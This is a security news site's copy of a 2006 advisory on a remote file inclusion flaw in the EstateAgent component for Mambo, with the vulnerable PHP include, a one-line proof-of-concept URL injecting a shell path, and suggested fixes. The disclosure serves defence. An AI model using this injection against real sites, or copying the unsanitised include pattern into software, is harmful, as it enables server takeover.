Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA21543] mail f/w system Mail Header Injection Vulnerability

  [SA21604] Drupal E-commerce Module Script Insertion Vulnerabilities

  [SA21603] Drupal Easylinks Module Script Insertion and SQL Injection

  [SA21584] Empire CMS "check_path"
File Inclusion Vulnerability

From:outlaw_(at)_aria-security.net <outlaw_(at)_aria-security.net>
Date:21.08.2006
Subject:Mambo Component - EstateAgent Remote File Inclusion

               ##################################################################
#########################
               #                       Aria-Security.net Advisory                                        #
               #                       Discovered  by: O.U.T.L.A.W                                       #     

               #                       < www.Aria-security.net >                                         #
               #               Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp                              #
               #                                                                                  
       #
               ##################################################################
#########################


#Software: Mambo Component - EstateAgent  
#Attack method:
#Source:
#
# Don't allow direct linking
 defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

require_once( $mainframe->getPath( 'front_html' ) );

require($mosConfig_absolute_path.
"/administrator/components/com_estateagent/configuration.php");


*********************************************************************************
***

                                                                                 
        
#Proof of Concept:                                                                        
#
#www.site.com/com_estateagent/estateagent.php?mosConfig_absolute_path=shell
#

#----------------------------------------------------------                               
#    
#Solutions :
#1 - If you have access on webserver turn register_globals in php.ini off
#2 - You must give a value before put the value of variable in the include function or check and filter

#unnormal entrance out .
#
#                                                                                  
               
#Contact : Outlaw@aria-security.net                                                                            

                                                 

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server